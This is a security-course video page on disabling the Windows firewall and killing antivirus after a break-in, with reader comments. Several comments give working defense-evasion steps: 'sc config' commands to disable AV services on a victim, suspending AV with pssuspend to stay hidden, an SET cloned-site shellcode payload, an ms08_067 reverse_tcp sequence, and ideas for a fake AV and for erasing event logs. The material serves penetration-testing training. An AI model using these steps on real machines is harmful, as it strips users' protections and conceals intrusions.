Description: This is Part 7 of the Security Metasploit Framework Expert (SMFE) course material. You can begin by watching Part 1 here: http://www.securitytube.net/video/2556 . Enjoy! Certifications page: http://www.securitytube.net/cert-list
In this video, we will look at how to disable the windows firewall and kill the AV after breaking in. The interesting thing to note is that the default script to kill AV in meterpreter which is "Killav" fails with almost all of the latest AVs because it uses a simple exe image name search and tries to kill the processes. However, as most of the AV manufacturers run a watchdog service which is typically unstoppable, this service restarts the AV processes again.
We will learn how to find the services which are running on the system, locate the AV services, change their configurations from the command line and then see how to kill them. Most of this video, has little to do with Metasploit and more to do with how to "do a custom kill" :) After, one cannot be as good as the tools he uses :) Tools are an aid, not a crutch.
Please do leave your comments behind!
Tags: kill , av , disable , firewall ,
That was fast :)
Great video
L0ve Y0u MaN...............
It's quite late in my country, but I really love watching your videos Vivek, and this one is very interesting !!
Nice video Vivek, I wonder if this technique will work with Microsoft Security Essentials ??
Hi Chard,
I tested this with Microsoft Security Essentials...
It does work using the disable service method from Vivek's video. See customized command to disable the MS Security Essentials service.
Scenario: (As shown in video)
1. Start shell on victim's computer
2. Run "sc config msmpsvc start= disabled"
3. Reboot victim
Special Note:
This may not be the best solution if your trying to be stealthy. After disabling MS Security Essential the systray icon will turn red. This will notify the user there's a problem.
Stealthy Alternative:
I've never tried this myself but, in order to be stealthy... You could uninstall the AV and replace it with a fake systray icon or better a full blown non functional AV. Even with no programing experience you can probably build a simple application using screenshots from the real AV, Visual Studio and Google. This application would look real but not do anything.
Thanks,
@PoisonReverse - that's an interesting observation ... thank you.
When I get chance, I'll play around with Sophos AV to see if there's anything special about that (if so, and if I manage to deal with it). In the meantime, maybe others can look at AV to which they have access and report in this thread. I'm sure that the ST community can prove how important such collaboration is!
@vivek thanks really really nice tutorial. It's just that during the exploit process using metasploit if an AV is running it detects the payload and stops it from running. That's an issue I'm facing.
Great as usual.
For tasks and services it is more easy (for me) to do :
Start -> left clik on "My Computer" -> manage. Quicker, all in one window.
Dear j0k3rr,
I ran into the same issue when I started learning about this stuff. There are alternative ways of encoding a payload which will bypass most AV. Try researching Shellcodes, VBS encoding and FUD Crypters.
Here's an example of a Shellcode payload hosted on a webserver. Created using the Social Engineering Toolkit.
1. Start BT
2. Start terminal
3. type "cd /pentest/exploits/set" enter
4. type "./set"
5. 1(Social) -> 2 (Website)-> 1(Java)-> 2 (Cloner)www.google.com -> 13 (Shellcode)
I highly recommend analazing what S.E.T. is doing in the background. Try recreating the same attack using the Metasploit Framework alone.
Thanks,
Dear dge,
The reason Vivek was showing us the how to disable a service using the command prompt is because an attacker may not have access to the victims mouse and keyboard.
When exploiting a vulnerability the first step is often to obtain a shell on the remote machine. Once that's done you can install backdoors or remote administration tools.
I hope this clarifies why in this scenario you would'nt use "Computer Management".
Awesome as always!
hi ,PoisonReverse can you suggest some book , study material, any useful link regarding encoding , shellcode because i am also facing the problem of detecting by av .
thnx
PoisonReverse has all the answers already :) AV evasion is not a topic which can be isolated to the realm of pure Metasploit usage. Also, to truly evade AVs you might need to encode, encrypt, be polymorphic etc. Still there is no certainty you would have a "universal AV evasion" technique. Even if you get one, it will not last for long as soon as you disclose it :)
I will briefly talk about encoding and packing with metasploit for AV evasion in later videos. If time permits, I might also discuss how to write a custom encoder.
the next video is available now:
http://www.securitytube.net/video/2672
we will look at the concepts of windows desktops and other interesting things in this.
@PoisonReverse Would it possible for you to make a quick video for the MS Essentials? Would be a nice addition to the course :)
mister PoisonReverse,
Thanks for your reply.
Sorry certainly a mistake from me. I said that for when mister Ramachandran was showing how to verify that services are disabled on the victim machine or where the logs are at the end of the video. That was for not making a lot of clics when you whant to verify. Excuse me for my bad English to (French speeker). A nice day to everyone.
@Vivek - I really hope you get chance to create a video dealing with how to write a custom encoder. I realise that it might not remain functional for long, but it would be a scaffold upon which other encoding ideas could be developed.
Hi vivek..
i hav a problem in executing exploit whn firewall is On bcoz of timeout error even i cant ping the windows system. but in your vedio firewall is on and after executing exploit u r disabling firewall.. pls tell me how to do it..
thanks
Hi Vivek
as neo_panky said i am also facing same issue; pls throw some light
Hi
Thank you so much,I am newbie with metasploit and I am wondering why this"exploit(ms08_067_netapi) >exploit" doesn't work with me, I mean msf shows me "unknown commnde...."any one can tell me please how can I reach Meterpreter? Thanks
@Vivek great videos and i watched the last 6 videos successively till now. I have two questions
1- Why don't the AV detect the metasploit payload used ?
2- Can i avoid the pop up when i disable the firewall ?
Thank you for the great videos
Hi everyone, Thank you very much Vivek for all the tutorials you make available to the community.
I have one question. why did you execute this command " execute -f cmd.exe -c -H " instead of " Shell" in meterpreter to get a command prompt.does it give the same result?
Probably too late in the thread for most people to see, but you might all be interested to know that you can easily suspend the AV process instead of killing it
I only tried it locally, but it worked great with security essentials, and probably other AVs as well. The watchdog (or similar) service wont restart a suspended process. And the best thing? The tray icon even stays on (but you can't click it)!
I used pssuspend from sysinternals suite. Of course you have to somehow get the executable to the remote machine before using it.
Exploit was not working when the firewall was on. When I turned off the firewall it was working fine. Can anybody plz explain me this mystery?
Thanks for the awesome videos! I was running Windows XP Home as my lab PC so it didn't have Tasklist or Taskkill. You can download the taskkill from http://web.archive.org/web/20070125030456/http://home.wanadoo.nl/gigajosh/files/taskkill_en.zip and tasklist from http://www.computerhope.com/download/winxp.htm
Afterwards I just used terminal to unzip the .zip file. Then I used meterpreter ls and cd to work my way into System32, after which I used the upload command for both of the files.
Woops I hit reply on accident. Anyways it ended up working in the Windows shell :) Keep up the awesome work on the videos!
best site i have ever seen..
best site i have ever seen.
thnx vivek
Quick question Vivek, what SP are you running Windows XP here? SP2? Thanks for these videos and the assembly videos. Love em.
Hi Vivek i could not connect to meterpreter what do i do? please give some idea for that....please find my following commands see weather it is correct or not..
use exploit/windows/smb/ms08_067_netapi
use LHOST (My IP)
use RHOST ( Target system IP)
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
and i'm using windows xp 2 os only...
can you please clear my silly doubt.
how can you get in successful (meterpreter) to the target while the firewall is on?
thanks
Great video, except for one thing.
When you clear the event logs, it leaves behind a Success Audit security log indicating that the logs were cleared. Isn't this suspicious? Is there a way to clear the logs without leaving this behind?
Brilliant idea.. abt disabling the service watch dog .. So there is a catch ny way for AVG 2012 !! TY Vivek .. Awesome Video !
Hi vivek
i download avg 2013 and try do disabled the avgwd but he give me "Access is denied"
what can be the reason?
C:\WINDOWS\system32>sc config avgwd start= disabled
sc config avgwd start= disabled
[SC] ChangeServiceConfig FAILED 5:
Access is denied.
Nice video. You are good at explaining things in an understandable way. Is it possible to alter the antivirus exceptions through the command prompt also (for example after the AV is killed)?
tnx vivek, you'r tuto was really really extremely great ...
i have a question, friends
whene i try to use the same strategie against avast anti virus, killing AvastSvc.exe, did not work, it tel me that i should update some key in the registry
any ideas ????
Hi vivek
i try disable the AV service AVGIDSAgent ind i get "[SC] ChangeServiceConfig FAILED 5:"
why ?
C:\WINDOWS\system32>sc config AVGIDSAgent start= disabled
sc config AVGIDSAgent start= disabled
[SC] ChangeServiceConfig FAILED 5:
Access is denied.
Thanks very much vivek..
i have problem with avast i can not disable it..
the avast version is 8 and i have tried this steps but i could not do that..
please help me...
Please
thanks
i am waiting for response...